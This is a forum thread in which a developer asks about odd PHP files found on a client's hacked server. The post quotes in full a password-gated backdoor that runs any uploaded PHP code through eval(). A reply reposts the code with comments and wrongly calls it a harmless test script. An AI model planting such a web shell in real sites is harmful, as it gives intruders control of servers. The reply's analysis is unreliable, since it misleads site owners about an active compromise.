Recognize this code??

[rhouk]

It appears my clients web site files have been hacked. I've started finding odd php files on their server, with no explanation as to how they got there.  When I open these files they appear blank until I scroll down and to the center, where I find the following script.  Can anyone tell me what this script is doing.

 

<?php error_reporting(1);global $HTTP_SERVER_VARS; function say($t) { echo "$t\n"; }; function testdata($t) { say(md5("testdata_$t")); }; echo "<pre>"; testdata('start'); if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){ if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ eval($code); }else{ testdata('f'); }; }else{ testdata('pass'); }; testdata('end'); echo "</pre>"; ?>

 

I know this won't fix the issue, but understanding what they are doing might help.  Thanks!!!!

[benphp]

It doesn't seem to be doing anything malicious - looks like it's reading a file that contains PHP. Someone submits a form with "p" = the encrypted string, and it runs two functions to read and display code within a selected file.

 

It does actually look like a test script. Maybe someone was troubleshooting your site?

 

<?php 
error_reporting(1);
global $HTTP_SERVER_VARS; 
function say($t) { //function prints whatever is fed to it
echo "$t\n"; 
}; 
function testdata($t) { //function that encrypts a string and prints it using the say function
say(md5("testdata_$t")); 
}; 
echo ""; 
testdata('start'); //sends the string 'start' to the say testdata function
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3"){  //reads a form value "p" to see if it matches an encrypted value - a password?
if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])){ //opens a file and reads it  "rb"
	eval($code); //reads the code within the file
} else { 
	testdata('f'); //prints it out
}; 
}else{ 
testdata('pass'); //or it fails
}; 
testdata('end'); 
echo ""; 
?>